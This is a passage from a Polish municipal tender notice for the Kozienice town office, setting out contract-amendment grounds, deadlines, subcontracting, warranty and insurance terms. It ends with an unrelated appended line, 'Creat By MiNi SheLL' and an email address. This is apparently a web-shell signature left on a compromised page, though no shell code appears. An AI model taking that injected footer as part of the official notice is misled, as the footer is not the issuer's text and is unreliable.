2.	W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy materiały nie mogą być użyte przy realizacji inwestycji z powodu: zaprzestania produkcji lub zastąpienia innymi; w trakcie wykonywania zamówienia nastąpiła zmiana przepisów Prawa budowlanego; w trakcie realizacji zamówienia zastosowano lepsze materiały bądź inną technologię o lepszych parametrach technicznych wynikającą z dostępności danych produktów na rynku,, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie, przy czym wykonanie robót zamiennych nie może skutkować zwiększeniem wartości wynagrodzenia wykonawcy. Zmiana może być wprowadzona na wniosek Wykonawcy lub Zamawiającego i zaakceptowana przez Zamawiającego i nie może skutkować zwiększeniem wartości umowy, określonej w § 3 umowy.
3.	Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu.
4.	Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnianie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę. 
5.	W przypadku aktualizacja danych Zamawiającego i Wykonawcy w przypadku zmiany tych danych,
6.	Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
7.	Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, 
w szczególności na jej zakres, termin.
8.	Gdy zajdzie konieczność zmiany podwykonawców robót, którym wykonawca powierzył wykonanie zamówienia,  w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego.
9.	Gdy zajdzie konieczność zmiany osób sprawujących funkcję kierowników nad prawidłową realizacją umowy.
10.	W przypadku zmiany zakresu rzeczowego zadania, odpowiednio do możliwości  finansowych Zamawiającego.
11.	Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.
12.	W przypadku zmiany zakresu rzeczowego zadania odpowiednio do możliwości finansowych pozyskanych środków zewnętrznych. 
13.	W przypadku zmiany zasad finansowania inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2014 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje dotyczące podwykonawstwa:
1.Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
2.	 Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom poprzez wskazanie w ofercie części zamówienia, której wykonanie powierzy  podwykonawcom. Wskazanie niniejszego nastąpi w Formularzu oferty ( załącznik nr 1 siwz). Sposób postępowania w przypadku powierzenia do wykonania części przedmiotu zamówienia podwykonawcom zawarty został we wzorze umowy załączonym do niniejszej SIWZ. Proponowany podwykonawca winien posiadać wymagane obowiązującymi przepisami uprawnienia do wykonywania  powierzonych mu robót. Zamawiający może żądać dodatkowych dokumentów. 
3.	Wykonawca może powierzyć część robót  podwykonawcy, na których zasobach  powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu o których mowa w art. 22 ust. 1.
4.Wymagany okres zabezpieczenia roszczeń z tytułu rękojmi za wady i gwarancji na oferowany przedmiot   zamówienia na warunkach zgodnych z określonymi w opisie przedmiotu zamówienia i wzorze umowy wynosi 4 lata.
5.Wymagany jest obowiązek posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na kwotę nie mniejszą niż 100% wartości oferty brutto.  Wartość ubezpieczenia podana w walutach innych niż PLN Wykonawca przeliczy wg średniego kursu NBP na dzień wydania dokumentu przez ubezpieczyciela. Dokument ten w formie kserokopi poświadczonej przez Wykonawcę  Wykonawca zobowiązany jest przedłożyć Zamawiającemu zgodnie z postanowieniami § 6 wzoru umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com